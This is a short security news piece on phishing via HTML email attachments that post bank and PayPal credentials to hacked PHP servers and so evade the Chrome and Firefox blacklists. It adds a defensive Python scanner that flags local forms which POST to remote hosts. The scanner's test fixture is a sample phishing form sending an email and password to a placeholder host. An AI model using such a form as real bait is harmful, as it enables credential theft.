Google Chrome and Mozilla Firefox come with a security feature that lets the browsers receive blacklists of URLs of known phishing sites. The browsers won’t go to those sites unless users specifically allow it.
But a new phishing fraud is targeting bank and PayPal passwords and other private data of online users through a design that beats the security features of both Chrome and Firefox. M86 Security Labs discovered this technique of bypassing the blacklist-based protection.
This new technique relies on the old POST method of an HTML form. Users no longer have to visit phony sites and fill out forms that look like those of PayPal or online banking.
Instead, users receive the form as an HTML attachment. When unsuspecting users fill out the form and click the submit button in the attached document, the data they entered is sent to hacked PHP servers through a POST request. The thing to notice is that even though the URL the data is posted to is a phishing URL, Chrome and Firefox wouldn’t be able to detect such activity at all.
Chrome and Firefox are not picking up on this activity because not many hacked PHP servers end up on those blacklists. Beyond this, as the PHP code doesn’t show up in the client’s browser, there is not much that can be done there to detect any phishing activity.
Users also play their part by not being informed about such activities, and regular users aren’t sophisticated enough to pick up on them. More information can be found at http://labs.m86security.com/2011/03/phishing-scam-in-an-html-attachment/
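Since the browser blacklist does not help here, the attachment itself can be inspected before it reaches the user. The following is an added example, not code from M86 or from either browser: it flags forms in a local HTML file that POST to a remote host. The function name, the sample attachment and the host `compromised.example` are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample attachment; compromised.example is a placeholder host.
SAMPLE_ATTACHMENT = """
<html><body>
<form method="post" action="http://compromised.example/update.php">
  Email: <input type="text" name="email">
  Password: <input type="password" name="pass">
  <input type="submit" value="Submit">
</form>
<form method="get" action="#search"><input name="q"></form>
</body></html>
"""

class _FormScanner(HTMLParser):
    """Collects every <form> with its method, action and input types."""
    def __init__(self):
        super().__init__()
        self.forms = []
        self._open = None
    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._open = {"method": a.get("method", "get").strip().lower(),
                          "action": a.get("action", "").strip(),
                          "input_types": []}
            self.forms.append(self._open)
        elif tag == "input" and self._open is not None:
            self._open["input_types"].append(a.get("type", "text").lower())
    def handle_endtag(self, tag):
        if tag == "form":
            self._open = None

def find_remote_post_forms(html):
    """Return forms in a local HTML file that POST to a remote http(s) host."""
    scanner = _FormScanner()
    scanner.feed(html)
    scanner.close()
    findings = []
    for form in scanner.forms:
        url = urlparse(form["action"])
        if form["method"] == "post" and url.scheme in ("http", "https") and url.hostname:
            findings.append({"host": url.hostname, "action": form["action"],
                             "asks_password": "password" in form["input_types"]})
    return findings

if __name__ == "__main__":
    print(find_remote_post_forms(SAMPLE_ATTACHMENT))
```

A hit means only that a local file submits data to a remote server; whether the receiving host is hostile still has to be judged separately.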